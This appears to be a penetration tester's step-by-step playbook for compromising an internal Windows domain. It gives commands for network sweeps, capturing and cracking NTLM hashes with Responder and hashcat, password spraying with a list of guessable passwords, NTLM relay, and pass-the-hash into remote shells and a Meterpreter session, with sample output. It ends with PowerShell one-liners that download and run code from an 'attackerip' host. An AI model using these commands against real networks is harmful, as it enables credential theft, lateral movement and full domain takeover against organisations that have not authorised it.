Internal Network

Host Discovery

Nmap Ping Scan Private Ranges and start responder

responder -i eth0
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
#netdiscover
netdiscover -i eth0 -P
#NBTScan
nbtscan 192.168.1.0/24

Now cat grep and sort the IP addresses into a file called Targets.txt

Nmap Scans

mkdir Scans
nmap -p 21 -n --open -iL targets -oA Scans/ftp
nmap -p 22 -n --open -iL targets -oA Scans/ssh
nmap -p 23 -n --open -iL targets -oA Scans/telnet
nmap -p 80 -n --open -iL targets -oA Scans/http
nmap -p 443 -n --open -iL targets -oA Scans/https
nmap -p 445 -n --open -iL targets -oA Scans/smb
nmap -p 3389 -n --open -iL targets -oA Scans/rdp
cat Scans/ftp.nmap | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh.nmap | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet.nmap | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http.nmap | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https.nmap | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb.nmap | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp.nmap | grep for | cut -d " " -f 5 > rdphosts.txt

Scanning

Start Nessus on discovered IP addresses

Run AutoScan.sh against all Targets.txt

Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.

#!/bin/bash
for Target in $(cat Targets.txt)
do
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Auto Scanner" | tee -a Scanner.log
echo "$Target - Scanned: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "TCP Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
#Full
nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log
#Fast
#nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "UDP Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
#Full
#nmap -sUV -sC --top-ports 200 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log
#Fast
nmap -sUV -sC --top-ports 10 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Nikto Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
nikto -p 80,443,8000,8080 -h $Target | tee $Target-03-Nikto.txt | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "SSL Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
sslscan --show-certificate --no-colour $Target | tee $Target-04-SSLScan.txt | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Directory Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
gobuster -u http://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
gobuster -k -u https://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
done
for Target in $(cat Targets.txt)
do
cat $Target-01-NmapTCP.txt | grep /tcp | grep open >> "$Target"_Ports.txt 2> /dev/null
cat $Target-02-NmapUDP.txt | grep /udp | grep open | grep -v filtered >> "$Target"_Ports.txt 2> /dev/null
(
input="$Target"_Ports.txt
while IFS= read -r port
do
echo "$Target":"$port" >> ServicesList.txt
done < "$Target"_Ports.txt
)
rm *_Ports.txt
done
echo
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "The following services were found:" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
cat ServicesList.txt | tee -a Scanner.log
done

Check responder for hashes and crack with hashcat

hashcat --force -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules

Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl

cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/

Then repeat the cracking process with a good rule list.

Domain enumeration

Get DC List

# Windows command
nltest /DCLIST:domain.local
# Linux Commands
cat /etc/resolv.conf
nmap -p 88,389,636 -iL Targets.txt --open
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
nslookup
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN

Get user list

rpcclient -U "domain\\username" 10.0.0.1 (DC)
rpcclient $> enumdomusers

Copy list of users to "rpcuserlist.txt" file and sort:

cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.

May be worth checking the password lockout policy with the client if in a sensitive environment.

msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run

When time is up change the password and rerun.

Passwords to try:

Clientname2019
Location2019
Password12345!
Summer2019!
Spring2019!
Summer2018!
Password2018!
Welcome2018!
Password 2018!
Summer@2018

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated

for i in $(cat 00-Targets.txt);do smbmap -H $i; done | tee -a SMBMap-Output.txt

Find open writable shares and search for authenticated file servers:

for i in $(cat Targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
ctrl + f WRITE (Search for writable folders)

EyeWitness

python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB

[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On

Start responder

python Responder.py -I <interface> -r -d -w
responder -I <interface> -r -d -w

Create a list of targets with SMB signing disabled.

nmap -n -p 137,139,445 --script=smb-security-mode 192.168.1.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt

Now start ntlmrelayx.py against the targets

python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt

If you capture a high priv users account it will drop the hashes from the system

Now use psexec within metasploit to login to the target

msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit

Pass the hash

Either will do, once the enumeration has finished upload the csv files to your attacker machine.

Then run

python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
Server\Administrator
root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
root@Kali:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
root@Kali:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 administrator@192.168.1.25
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
root@Kali:~# apt-get update
root@Kali:~# apt-get install freerdp-x11
root@Kali:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
meterpreter > exit

This will output the local hashes if you capture a domain admins NTLM hash.

Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py

Bloodhound

Once on the domain as a windows user run the following:

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"

Once on your attacker machine make sure you have bloodhound installed and then execute:

neoj4 console
bloodhound

Visit 127.0.0.1:7687

Enter your password and upload the csv files you extracted from the target.

Click queries and then find shortest path to domain admin